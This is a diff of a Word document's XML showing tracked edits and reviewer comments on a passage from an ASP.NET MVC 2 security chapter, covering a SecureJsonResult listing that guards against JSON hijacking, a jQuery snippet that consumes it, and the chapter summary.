+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="204" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="205" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>if (Data != null)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="206" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="207" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="208" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:lastRenderedPageBreak/>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="209" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="210" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="211" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>var enumerable = Data as IEnumerable;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="212" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="213" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="214" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="215" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>if (enumerable != null)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="216" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="217" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="218" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="219" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="220" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="221" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="222" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="223" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="224" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="225" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>Data = new {d = enumerable};</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">           </w:t>
+      </w:r>
+      <w:ins w:id="226" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">              </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="227" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="228" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="229" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="230" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="231" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="232" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="233" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="234" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>var serializer = new JavaScriptSerializer();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="235" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="236" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="237" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="238" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>response.Write(serializer.Serialize(Data));</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="239" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="240" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:commentRangeEnd w:id="150"/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeAnnotation"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:commentReference w:id="150"/>
+      </w:r>
+      <w:r>
+        <w:t>#1 Wrapping vulnerable JSON securely</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">This action result encapsulates this tricky code </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Bold"/>
+        </w:rPr>
+        <w:t>(2)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to output the proper JSON.  It works well  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>The downside to this approach is that we must use this "d" variable in our JavaScript code.  Listing 11.15 shows consuming jQuery.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Listing 11.15 Consuming SecureJsonResult with jQuery</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>$(function() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">$.getJSON('/post/getsecurejson', </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>if (context == null)</w:t>
+        <w:t>function(data) {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3584,25 +5057,87 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
+      </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
+        <w:t>var options = '';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>throw new ArgumentNullException("context");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>for (var i = 0; i &lt; data.d.length; i++) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>options += '&lt;option value="' +</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>data.d[i].Id + '"&gt;' + data.d[i].Title +</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:ins w:id="241" w:author="JSkinner" w:date="2010-03-03T18:01:00Z">
+        <w:r>
+          <w:t xml:space="preserve">          </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>'&lt;/option&gt;';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
       <w:r>
         <w:tab/>
         <w:t>}</w:t>
@@ -3614,464 +5149,6 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>HttpResponseBase response = context.HttpContext.Response;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:tab/>
-        <w:t>if (!string.IsNullOrEmpty(ContentType))</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                |#2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>{</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                                                      |#2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>response.ContentType = ContentType;</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">               |#2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                                                 |#2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>E</w:t>
-      </w:r>
-      <w:r>
-        <w:t>lse</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                                        |#2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>{</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                                                       |#2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>response.ContentType = "application/json";</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">    |#2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>if (ContentEncoding != null)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                                 |#2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>response.ContentEncoding = ContentEncoding;</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">          |#2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>if (Data != null)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>var enumerable = Data as IEnumerable;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>if (enumerable != null)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>Data = new {d = enumerable};</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">           #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>var serializer = new JavaScriptSerializer();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>response.Write(serializer.Serialize(Data));</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeAnnotation"/>
-      </w:pPr>
-      <w:r>
-        <w:t>#1 Wrapping vulnerable JSON securely</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">This action result encapsulates this tricky code </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Bold"/>
-        </w:rPr>
-        <w:t>(2)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to output the proper JSON.  It works well  </w:t>
-      </w:r>
-      <w:commentRangeStart w:id="24"/>
-      <w:commentRangeStart w:id="25"/>
-      <w:r>
-        <w:t>The downside to this approach is that we must use this "d" variable in our JavaScript code.  Listing 11.15 shows consuming jQuery.</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="24"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
-        <w:commentReference w:id="24"/>
-      </w:r>
-      <w:commentRangeEnd w:id="25"/>
-      <w:r>
-        <w:commentReference w:id="25"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Listing 11.15 </w:t>
-      </w:r>
-      <w:commentRangeStart w:id="26"/>
-      <w:r>
-        <w:t>Consuming SecureJsonResult with jQuery</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="26"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:b w:val="0"/>
-          <w:vanish/>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:commentReference w:id="26"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>$(function() {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">$.getJSON('/post/getsecurejson', </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>function(data) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>var options = '';</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>for (var i = 0; i &lt; data.d.length; i++) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>options += '&lt;option value="' +</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>data.d[i].Id + '"&gt;' + data.d[i].Title +</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>'&lt;/option&gt;';</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
       </w:r>
       <w:r>
         <w:tab/>
@@ -4122,8 +5199,6 @@
       <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
-      <w:commentRangeStart w:id="27"/>
-      <w:commentRangeStart w:id="28"/>
       <w:r>
         <w:t xml:space="preserve">We recommend using the default behavior of using HTTP POST request to retrieve JSON data.  If that becomes a problem, </w:t>
       </w:r>
@@ -4133,18 +5208,6 @@
       <w:r>
         <w:t>technique.</w:t>
       </w:r>
-      <w:commentRangeEnd w:id="27"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
-        <w:commentReference w:id="27"/>
-      </w:r>
-      <w:commentRangeEnd w:id="28"/>
-      <w:r>
-        <w:commentReference w:id="28"/>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4159,23 +5222,7 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">No application can ever be totally secure, but in this chapter we learned about several vulnerabilities, and how we can protect our ASP.NET MVC 2 applications.  </w:t>
-      </w:r>
-      <w:commentRangeStart w:id="29"/>
-      <w:r>
-        <w:t xml:space="preserve">We explored using </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="29"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:commentReference w:id="29"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
+        <w:t xml:space="preserve">No application can ever be totally secure, but in this chapter we learned about several vulnerabilities, and how we can protect our ASP.NET MVC 2 applications.  We explored using the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4186,30 +5233,27 @@
       <w:r>
         <w:t xml:space="preserve"> to enforce authentication and authorization on actions.  We understood cross site scripting and learned to never trust user input and </w:t>
       </w:r>
-      <w:commentRangeStart w:id="30"/>
-      <w:r>
-        <w:t xml:space="preserve">HTML </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">to </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">encode all </w:t>
-      </w:r>
-      <w:commentRangeStart w:id="31"/>
-      <w:r>
-        <w:t xml:space="preserve">output.  </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="30"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
-        <w:commentReference w:id="30"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Cross site request forgeries are neutered when the </w:t>
+      <w:ins w:id="242" w:author="JSkinner" w:date="2010-03-03T18:02:00Z">
+        <w:r>
+          <w:t xml:space="preserve">to </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:del w:id="243" w:author="JSkinner" w:date="2010-03-03T18:02:00Z">
+        <w:r>
+          <w:delText xml:space="preserve"> </w:delText>
+        </w:r>
+        <w:r>
+          <w:delText>to</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">encode all output.  Cross site request forgeries are neutered when the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4220,12 +5264,26 @@
       <w:r>
         <w:t xml:space="preserve"> is used to verify that input is coming from trusted </w:t>
       </w:r>
-      <w:commentRangeEnd w:id="31"/>
-      <w:r>
-        <w:commentReference w:id="31"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">forms.  We learned how ASP.NET MVC 2 helps protect against JSON hijacking and how to explicity work-around the changes to </w:t>
+      <w:del w:id="244" w:author="JSkinner" w:date="2010-03-03T18:02:00Z">
+        <w:r>
+          <w:delText>forms</w:delText>
+        </w:r>
+      </w:del>
+      <w:ins w:id="245" w:author="JSkinner" w:date="2010-03-03T18:02:00Z">
+        <w:r>
+          <w:t>sources</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>.  We learned how ASP.NET MVC 2 helps protect against JSON hijacking and how to explicit</w:t>
+      </w:r>
+      <w:ins w:id="246" w:author="JSkinner" w:date="2010-03-03T18:02:00Z">
+        <w:r>
+          <w:t>l</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t xml:space="preserve">y work-around the changes to </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4267,7 +5325,27 @@
 
 <file path=word/comments.xml><?xml version="1.0" encoding="utf-8"?>
 <w:comments xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
-  <w:comment w:id="0" w:author="Katharine Osborne" w:date="2010-02-06T23:18:00Z" w:initials="KO">
+  <w:comment w:id="2" w:author="JSkinner" w:date="2010-03-02T18:37:00Z" w:initials="JS">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Minor rewording as this sounded a bit clumsy. </w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="18" w:author="JSkinner" w:date="2010-03-02T18:42:00Z" w:initials="JS">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Is this supposed to be in a bulleted list?</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="19" w:author="Katharine Osborne" w:date="2010-02-06T23:40:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -4279,479 +5357,123 @@
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>Try not to repeat the same word over and over.</w:t>
-      </w:r>
-    </w:p>
+        <w:t>Dashes used to show a pause should be em dashes (type the dash character twice to get an em dash in Word). Just FYI.</w:t>
+      </w:r>
+    </w:p>
